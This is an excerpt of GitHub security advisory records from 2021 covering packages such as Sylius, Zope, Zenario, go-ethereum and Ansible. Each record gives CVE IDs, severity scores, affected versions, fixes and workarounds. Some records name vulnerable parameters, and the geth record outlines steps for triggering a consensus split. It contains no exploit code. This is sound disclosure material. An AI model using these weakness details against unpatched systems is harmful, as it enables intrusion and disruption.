[{'package': {'ecosystem': 'Packagist', 'name': 'shopware/platform'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.4.1.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.4.1.0'}}, {'package': {'ecosystem': 'Packagist', 'name': 'shopware/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.4.1.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.4.1.0'}}]
[{'type': 'WEB', 'url': 'https://github.com/shopware/platform/security/advisories/GHSA-vrf2-xghr-j52v'}, {'type': 'PACKAGE', 'url': 'https://github.com/shopware/platform'}]
{'cwe_ids': ['CWE-200'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-06-24T19:20:27Z', 'nvd_published_at': None}
1.4.0
GHSA-rpxh-vg2x-526v
2021-06-30T17:59:43Z
2021-06-29T03:12:04Z
null
['CVE-2021-32720']
List of order ids, number, items total and token value exposed for unauthorized uses via new API
### Impact Part of the details (order ID, order number, items total, and token value) of all placed orders were exposed to unauthorized users. If exploited properly, a few additional information like the number of items in the cart and the date of the shipping may be fetched as well. This data seems to not be crucial nor is personal data, however, could be used for sociotechnical attacks or may expose a few details about shop condition to the third parties. The data possible to aggregate are the number of processed orders or their value in the moment of time. ### Patches The problem has been patched at Sylius 1.9.5 and 1.10.0 ### Workarounds There are a few ways to fix this without updating the code. The first possible solution is to hide the problematic endpoints behind the firewall from not logged in users. In order to achieve it one has to add the configuration in `config/packages/security.yaml`: ```yaml access_control: # ... - { path: "%sylius.security.new_api_shop_regex%/orders", role: IS_AUTHENTICATED_ANONYMOUSLY, methods: [POST] } - { path: "%sylius.security.new_api_shop_regex%/orders", role: ROLE_USER, methods: [GET] } ``` This would put only the order list under the firewall and allow only authorized users to access it. Once a user is authorized, it will have access to theirs orders only. The second possible solution is to decorate the `\Sylius\Bundle\ApiBundle\Doctrine\QueryCollectionExtension\OrdersByLoggedInUserExtension` and throw `Symfony\Component\Security\Core\Exception\AccessDeniedException` if the class is executed for unauthorized user.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'sylius/sylius'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.9.0'}, {'fixed': '1.9.5'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/Sylius/Sylius/security/advisories/GHSA-rpxh-vg2x-526v'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32720'}, {'type': 'WEB', 'url': 'https://github.com/Sylius/Sylius/commit/21d509851559230d03292b2a635a6951748c2758'}, {'type': 'WEB', 'url': 'https://github.com/Sylius/Sylius/releases/tag/v1.9.5'}, {'type': 'WEB', 'url': 'https://packagist.org/packages/sylius/sylius'}]
{'cwe_ids': ['CWE-200'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-28T18:23:22Z', 'nvd_published_at': '2021-06-28T19:15:00Z'}
1.4.0
GHSA-962m-m8jw-8wrr
2021-08-31T21:04:30Z
2021-06-15T16:10:49Z
null
['CVE-2021-32633']
Path Traversal in Zope
Zope is an open-source web application server. In Zope versions prior to 4.6 and 5.2, users can access untrusted modules indirectly through Python modules that are available for direct use. By default, only users with the Manager role can add or edit Zope Page Templates through the web, but sites that allow untrusted users to add/edit Zope Page Templates through the web are at risk from this vulnerability. The problem has been fixed in Zope 5.2 and 4.6. As a workaround, a site administrator can restrict adding/editing Zope Page Templates through the web using the standard Zope user/role permission mechanisms. Untrusted users should not be assigned the Zope Manager role and adding/editing Zope Page Templates through the web should be restricted to trusted users only.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'Zope'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.6'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'Zope'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0'}, {'fixed': '5.2'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/zopefoundation/Zope/security/advisories/GHSA-5pr9-v234-jw36'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32633'}, {'type': 'WEB', 'url': 'https://github.com/zopefoundation/Zope/commit/1f8456bf1f908ea46012537d52bd7e752a532c91'}, {'type': 'WEB', 'url': 'https://cyllective.com/blog/post/plone-authenticated-rce-cve-2021-32633/'}, {'type': 'PACKAGE', 'url': 'https://github.com/zopefoundation/Zope'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/05/21/1'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/05/22/1'}]
{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-27T20:08:03Z', 'nvd_published_at': '2021-05-21T14:15:00Z'}
1.4.0
GHSA-hr32-mgpm-qf2f
2021-06-03T23:33:32Z
2021-06-03T23:41:34Z
null
['CVE-2020-25633']
Generation of Error Message Containing Sensitive Information in RESTEasy client
A flaw was found in RESTEasy client in all versions of RESTEasy up to 4.5.6.Final. It may allow client users to obtain the server's potentially sensitive information when the server got WebApplicationException from the RESTEasy client call. The highest threat from this vulnerability is to data confidentiality.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.jboss.resteasy:resteasy-client'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.5.7.Final'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.5.6.Final'}}, {'package': {'ecosystem': 'Maven', 'name': 'org.jboss.resteasy:resteasy-client-microprofile'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.5.7.Final'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.5.6.Final'}}, {'package': {'ecosystem': 'Maven', 'name': 'org.jboss.resteasy:resteasy-client'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.14.0.Final'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.13.2.Final'}}, {'package': {'ecosystem': 'Maven', 'name': 'org.jboss.resteasy:resteasy-client-microprofile'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.14.0.Final'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.13.2.Final'}}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-25633'}, {'type': 'WEB', 'url': 'https://github.com/resteasy/Resteasy/pull/2665/commits/13c808b5967242eec1e877edbc0014a84dcd6eb0'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-25633'}, {'type': 'WEB', 'url': 'https://issues.redhat.com/browse/RESTEASY-2820'}]
{'cwe_ids': ['CWE-209'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-03T23:33:32Z', 'nvd_published_at': None}
1.4.0
GHSA-8hcm-jj4x-4gmr
2023-07-06T18:00:08Z
2021-06-08T20:11:40Z
null
['CVE-2021-27673']
reflected XSS in tribalsystems/zenario
Reflected XSS in the "admin_boxes.ajax.php" component of Tribal Systems Zenario CMS v8.8.52729 allows remote attackers to execute arbitrary code by injecting into the "cID" parameter when creating a new HTML component.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'tribalsystems/zenario'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.8.53370'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-27673'}, {'type': 'WEB', 'url': 'https://deadsh0t.medium.com/blind-error-based-authenticated-sql-injection-on-zenario-8-8-52729-cms-d4705534df38'}, {'type': 'PACKAGE', 'url': 'https://github.com/TribalSystems/Zenario'}, {'type': 'WEB', 'url': 'https://github.com/TribalSystems/Zenario/releases/tag/8.8.53370'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/163083/Zenario-CMS-8.8.52729-SQL-Injection.html'}]
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-19T21:43:48Z', 'nvd_published_at': '2021-04-15T14:15:00Z'}
1.4.0
GHSA-f6mq-5m25-4r72
2023-08-30T00:18:26Z
2021-06-15T16:08:16Z
null
['CVE-2021-20329']
go.mongodb.org/mongo-driver improperly validates cstrings when marshalling Go objects into BSON
Specific cstrings input may not be properly validated in the MongoDB Go Driver when marshalling Go objects into BSON. A malicious user could use a Go object with specific string to potentially inject additional fields into marshalled documents. This issue affects all MongoDB GO Drivers up to (and including) 1.5.0.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N'}]
[{'package': {'ecosystem': 'Go', 'name': 'go.mongodb.org/mongo-driver'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.5.1'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-20329'}, {'type': 'WEB', 'url': 'https://github.com/mongodb/mongo-go-driver/pull/622'}, {'type': 'WEB', 'url': 'https://github.com/mongodb/mongo-go-driver/commit/2aca31d5986a9e1c65a92264736de9fdc3b9b4ca'}, {'type': 'WEB', 'url': 'https://github.com/mongodb/mongo-go-driver/releases/tag/v1.5.1'}, {'type': 'WEB', 'url': 'https://jira.mongodb.org/browse/GODRIVER-1923'}]
{'cwe_ids': ['CWE-1287', 'CWE-20'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-14T19:11:50Z', 'nvd_published_at': '2021-06-10T17:15:00Z'}
1.4.0
GHSA-55xh-53m6-936r
2021-06-01T19:14:06Z
2021-06-01T21:17:36Z
null
[]
Improper Verification of Cryptographic Signature in aws-encryption-sdk-java
### Impact This advisory addresses several LOW severity issues with streaming signed messages and restricting processing of certain types of invalid messages. This update addresses an issue where certain invalid ECDSA signatures incorrectly passed validation. These signatures provide defense in depth and there is no impact on the integrity of decrypted plaintext. This ESDK supports a streaming mode where callers may stream the plaintext of signed messages before the ECDSA signature is validated. In addition to these signatures, the ESDK uses AES-GCM encryption and all plaintext is verified before being released to a caller. There is no impact on the integrity of the ciphertext or decrypted plaintext, however some callers may rely on the the ECDSA signature for non-repudiation. Without validating the ECDSA signature, an actor with trusted KMS permissions to decrypt a message may also be able to encrypt messages. This update introduces a new API for callers who wish to stream only unsigned messages. For customers who process ESDK messages from untrusted sources, this update also introduces a new configuration to limit the number of Encrypted Data Keys (EDKs) that the ESDK will attempt to process per message. This configuration provides customers with a way to limit the number of AWS KMS Decrypt API calls that the ESDK will make per message. This setting will reject messages with more EDKs than the configured limit. Finally, this update adds early rejection of invalid messages with certain invalid combinations of algorithm suite and header data. ### Patches Fixed in versions 1.9 and 2.2. We recommend that all users upgrade to address these issues. Customers leveraging the ESDK’s streaming features have several options to protect signature validation. One is to ensure that client code reads to the end of the stream before using released plaintext. With this release, using the new API for streaming and falling back to the non-streaming decrypt API for signed messages prevents using any plaintext from signed data before the signature is validated. See https://docs.aws.amazon.com/encryption-sdk/latest/developer-guide/about-versions.html#version2.2.x Users processing ESDK messages from untrusted sources should use the new maximum encrypted data keys parameter. See https://docs.aws.amazon.com/encryption-sdk/latest/developer-guide/about-versions.html#version2.2.x ### Workarounds None ### For more information https://docs.aws.amazon.com/encryption-sdk/latest/developer-guide/concepts.html#digital-sigs https://docs.aws.amazon.com/encryption-sdk/latest/developer-guide/about-versions.html#version2.2.x
[]
[{'package': {'ecosystem': 'Maven', 'name': 'com.amazonaws:aws-encryption-sdk-java'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.9.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.amazonaws:aws-encryption-sdk-java'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.2.0'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/aws/aws-encryption-sdk-java/security/advisories/GHSA-55xh-53m6-936r'}]
{'cwe_ids': ['CWE-347'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-01T19:14:06Z', 'nvd_published_at': None}
1.4.0
GHSA-h72c-w3q3-55qq
2023-03-03T23:20:29Z
2021-06-02T21:45:12Z
null
['CVE-2020-13388']
OS Command Injection in jw.util
An exploitable vulnerability exists in the configuration-loading functionality of the jw.util package before 2.3 for Python. When loading a configuration with FromString or FromStream with YAML, one can execute arbitrary Python code, resulting in OS command execution, because safe_load is not used.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'jw.util'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-13388'}, {'type': 'WEB', 'url': 'https://joel-malwarebenchmark.github.io'}, {'type': 'WEB', 'url': 'https://joel-malwarebenchmark.github.io/blog/2020/04/27/cve-2020-13388-jw-util-vulnerability/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20200528-0002/'}]
{'cwe_ids': ['CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-14T20:59:12Z', 'nvd_published_at': '2020-05-22T17:15:00Z'}
1.4.0
GHSA-35g4-qx3c-vjhx
2021-06-16T20:08:37Z
2021-06-21T17:09:22Z
null
['CVE-2021-32659']
Automatic room upgrade handling can be used maliciously to bridge a room non-consentually
### Impact If a bridge has room upgrade handling turned on in the configuration (the `roomUpgradeOpts` key when instantiating a new `Bridge` instance.), any `m.room.tombstone` event it encounters will be used to unbridge the current room and bridge into the target room. However, the target room `m.room.create` event is not checked to verify if the `predecessor` field contains the previous room. This means that any mailcious admin of a bridged room can repoint the traffic to a different room without the new room being aware. ### Patches Versions 2.6.1 and greater are patched. ### Workarounds Disabling the automatic room upgrade handling can be done by removing the `roomUpgradeOpts` key from the `Bridge` class options. ### References The issue is patched by https://github.com/matrix-org/matrix-appservice-bridge/pull/330 ### For more information] If you have any questions or comments about this advisory, email us at security@matrix.org.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]
[{'package': {'ecosystem': 'npm', 'name': 'matrix-appservice-bridge'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.6.1'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/matrix-org/matrix-appservice-bridge/security/advisories/GHSA-35g4-qx3c-vjhx'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32659'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/matrix-appservice-bridge/pull/330'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/matrix-appservice-bridge/commit/b69e745584a34fcfd858df33e4631e420da07b9f'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/matrix-appservice-bridge/releases/tag/2.6.1'}]
{'cwe_ids': ['CWE-306'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-16T20:08:37Z', 'nvd_published_at': '2021-06-16T19:15:00Z'}
1.4.0
GHSA-x5h4-9gqw-942j
2021-06-01T19:12:22Z
2021-06-01T21:17:53Z
null
[]
Improper Verification of Cryptographic Signature in aws-encryption-sdk
### Impact This advisory addresses several LOW severity issues with streaming signed messages and restricting processing of certain types of invalid messages. This ESDK supports a streaming mode where callers may stream the plaintext of signed messages before the ECDSA signature is validated. In addition to these signatures, the ESDK uses AES-GCM encryption and all plaintext is verified before being released to a caller. There is no impact on the integrity of the ciphertext or decrypted plaintext, however some callers may rely on the the ECDSA signature for non-repudiation. Without validating the ECDSA signature, an actor with trusted KMS permissions to decrypt a message may also be able to encrypt messages. This update introduces a new API for callers who wish to stream only unsigned messages. For customers who process ESDK messages from untrusted sources, this update also introduces a new configuration to limit the number of Encrypted Data Keys (EDKs) that the ESDK will attempt to process per message. This configuration provides customers with a way to limit the number of AWS KMS Decrypt API calls that the ESDK will make per message. This setting will reject messages with more EDKs than the configured limit. Finally, this update adds early rejection of invalid messages with certain invalid combinations of algorithm suite and header data. ### Patches Fixed in versions 1.9 and 2.2. We recommend that all users upgrade to address these issues. Customers leveraging the ESDK’s streaming features have several options to protect signature validation. One is to ensure that client code reads to the end of the stream before using released plaintext. With this release, using the new API for streaming and falling back to the non-streaming decrypt API for signed messages prevents using any plaintext from signed data before the signature is validated. See https://docs.aws.amazon.com/encryption-sdk/latest/developer-guide/about-versions.html#version2.2.x Users processing ESDK messages from untrusted sources should use the new maximum encrypted data keys parameter. See https://docs.aws.amazon.com/encryption-sdk/latest/developer-guide/about-versions.html#version2.2.x ### Workarounds None ### For more information https://docs.aws.amazon.com/encryption-sdk/latest/developer-guide/concepts.html#digital-sigs https://docs.aws.amazon.com/encryption-sdk/latest/developer-guide/about-versions.html#version2.2.x
[]
[{'package': {'ecosystem': 'PyPI', 'name': 'aws-encryption-sdk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.9.0'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'aws-encryption-sdk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.2.0'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/aws/aws-encryption-sdk-python/security/advisories/GHSA-x5h4-9gqw-942j'}]
{'cwe_ids': ['CWE-347'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-01T19:12:22Z', 'nvd_published_at': None}
1.4.0
GHSA-mvrg-5c4w-7qv4
2021-05-03T17:59:02Z
2021-06-22T15:25:22Z
null
['CVE-2018-10704']
Cross-site Scripting in yii2cmf
yidashi yii2cmf 2.0 has XSS via the /search q parameter.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'yidashi/yii2cmf'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.2'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.0'}}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2018-10704'}, {'type': 'WEB', 'url': 'https://github.com/yidashi/yii2cmf'}, {'type': 'WEB', 'url': 'http://testh5shanglv.minshengec.com:1024/phpmyadmin/doc/yii2cmf_xss.htm'}]
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-03T17:59:02Z', 'nvd_published_at': '2020-03-12T21:15:00Z'}
1.4.0
GHSA-r33q-22hv-j29q
2023-02-09T19:39:22Z
2021-06-29T21:14:07Z
null
['CVE-2020-26264']
Denial of service in github.com/ethereum/go-ethereum
### Impact A DoS vulnerability can make a LES server crash via malicious `GetProofsV2` request from a connected LES client. ### Patches The vulnerability was patched in https://github.com/ethereum/go-ethereum/pull/21896. ### Workarounds This vulnerability only concerns users explicitly enabling `les` server; disabling `les` prevents the exploit. It can also be patched by manually applying the patch in https://github.com/ethereum/go-ethereum/pull/21896. ### For more information If you have any questions or comments about this advisory: * Open an issue in [go-ethereum](https://github.com/ethereum/go-ethereum) * Email us at [security@ethereum.org](mailto:security@ethereum.org)
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/ethereum/go-ethereum'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.9.25'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/ethereum/go-ethereum/security/advisories/GHSA-r33q-22hv-j29q'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-26264'}, {'type': 'WEB', 'url': 'https://github.com/ethereum/go-ethereum/pull/21896'}, {'type': 'WEB', 'url': 'https://github.com/ethereum/go-ethereum/commit/bddd103a9f0af27ef533f04e06ea429cf76b6d46'}, {'type': 'PACKAGE', 'url': 'https://github.com/ethereum/go-ethereum'}, {'type': 'WEB', 'url': 'https://github.com/ethereum/go-ethereum/releases/tag/v1.9.25'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2021-0063'}]
{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-21T21:45:23Z', 'nvd_published_at': None}
1.4.0
GHSA-r5mf-q76q-f2xq
2021-05-28T22:24:47Z
2021-06-08T20:13:05Z
null
['CVE-2021-27676']
Cross-site scripting in Centreon
Centreon version 20.10.2 is affected by a cross-site scripting (XSS) vulnerability. The dep_description (Dependency Description) and dep_name (Dependency Name) parameters are vulnerable to stored XSS. A user has to log in and go to the Configuration > Notifications > Hosts page.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'centreon/centreon'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '20.10.7'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-27676'}, {'type': 'WEB', 'url': 'https://github.com/centreon/centreon/pull/9587'}, {'type': 'WEB', 'url': 'https://github.com/centreon/centreon/releases/tag/20.10.7'}, {'type': 'WEB', 'url': 'http://centreon.com'}]
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-28T22:24:47Z', 'nvd_published_at': '2021-05-26T11:15:00Z'}
1.4.0
GHSA-69v6-xc2j-r2jf
2021-05-21T21:51:49Z
2021-06-29T21:13:01Z
null
['CVE-2020-26241']
Shallow copy bug in geth
### Impact This is a Consensus vulnerability, which can be used to cause a chain-split where vulnerable nodes reject the canonical chain. Geth’s pre-compiled `dataCopy` (at `0x00...04`) contract did a shallow copy on invocation. An attacker could deploy a contract that - writes `X` to an EVM memory region `R`, - calls `0x00..04` with `R` as an argument, - overwrites `R` to `Y`, - and finally invokes the `RETURNDATACOPY` opcode. When this contract is invoked, a consensus-compliant node would push `X` on the EVM stack, whereas Geth would push `Y`. ### For more information If you have any questions or comments about this advisory: * Open an issue in [go-ethereum](https://github.com/ethereum/go-ethereum) * Email us at [security@ethereum.org](mailto:security@ethereum.org)
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/ethereum/go-ethereum'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.9.7'}, {'fixed': '1.9.17'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/ethereum/go-ethereum/core/vm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.19.7'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/ethereum/go-ethereum/security/advisories/GHSA-69v6-xc2j-r2jf'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-26241'}, {'type': 'WEB', 'url': 'https://github.com/ethereum/go-ethereum/commit/295693759e5ded05fec0b2fb39359965b60da785'}, {'type': 'WEB', 'url': 'https://blog.ethereum.org/2020/11/12/geth_security_release/'}]
{'cwe_ids': ['CWE-682'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-21T21:51:49Z', 'nvd_published_at': None}
1.4.0
GHSA-37m5-42qp-4qpr
2021-05-19T20:00:18Z
2021-06-18T18:38:09Z
null
['CVE-2021-32091']
Cross-site scripting in LocalStack
A Cross-site scripting (XSS) vulnerability exists in StackLift LocalStack.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'localstack'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.12.10'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32091'}, {'type': 'WEB', 'url': 'https://blog.sonarsource.com/hack-the-stack-with-localstack'}, {'type': 'WEB', 'url': 'https://portswigger.net/daily-swig/localstack-zero-day-vulnerabilities-chained-to-achieve-remote-takeover-of-local-instances'}]
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-19T20:00:18Z', 'nvd_published_at': '2021-05-07T05:15:00Z'}
1.4.0
GHSA-wv5p-gmmv-wh9v
2021-06-04T18:53:53Z
2021-06-01T21:53:29Z
null
['CVE-2021-20178']
Insertion of Sensitive Information into Log File in ansible
A flaw was found in ansible module where credentials are disclosed in the console log by default and not protected by the security feature when using the bitbucket_pipeline_variable module. This flaw allows an attacker to steal bitbucket_pipeline credentials. The highest threat from this vulnerability is to confidentiality.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.9.18'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-20178'}, {'type': 'WEB', 'url': 'https://github.com/ansible-collections/community.general/pull/1635,'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1914774'}, {'type': 'WEB', 'url': 'https://github.com/ansible/ansible/blob/v2.9.18/changelogs/CHANGELOG-v2.9.rst#security-fixes'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FUQ2QKAQA5OW2TY3ACZZMFIAJ2EQTG37/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HIU7QZUV73U6ZQ65VJWSFBTCALVXLH55/'}]
{'cwe_ids': ['CWE-532'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-01T20:21:27Z', 'nvd_published_at': '2021-05-26T12:15:00Z'}
1.4.0
GHSA-fg3j-q579-v8x4
2022-02-08T21:22:40Z
2021-06-15T15:54:32Z
null
['CVE-2021-31811']
Uncontrolled memory consumption
In Apache PDFBox, a carefully crafted PDF file can trigger an OutOfMemory-Exception while loading the file. This issue affects Apache PDFBox version 2.0.23 and prior 2.0.x versions.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.pdfbox:pdfbox'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.24'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.pdfbox:pdfbox-parent'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.24'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-31811'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r132e9dbbe0ebdc08b39583d8be0a575fdba573d60a42d940228bceff@%3Cnotifications.ofbiz.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r143fd8445e0e778f4a85187bd79438630b96b8040e9401751fdb8aea@%3Ccommits.ofbiz.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r179cc3b6822c167702ab35fe36093d5da4c99af44238c8a754c6860f@%3Ccommits.ofbiz.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2090789e4dcc2c87aacbd87d5f18e2d64dcb9f6eb7c47f5cf7d293cb@%3Cnotifications.ofbiz.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd4b6db6c3b8ab3c70f1c3bbd725a40920896453ffc2744ade6afd9fb@%3Cnotifications.ofbiz.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re0cacd3fb337cdf8469853913ed2b4ddd8f8bfc52ff0ddbe61c1dfba@%3Ccommits.ofbiz.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re3bd16f0cc8f1fbda46b06a4b8241cd417f71402809baa81548fc20e%40%3Cusers.pdfbox.apache.org%3E'}, {'type': 'WEB', 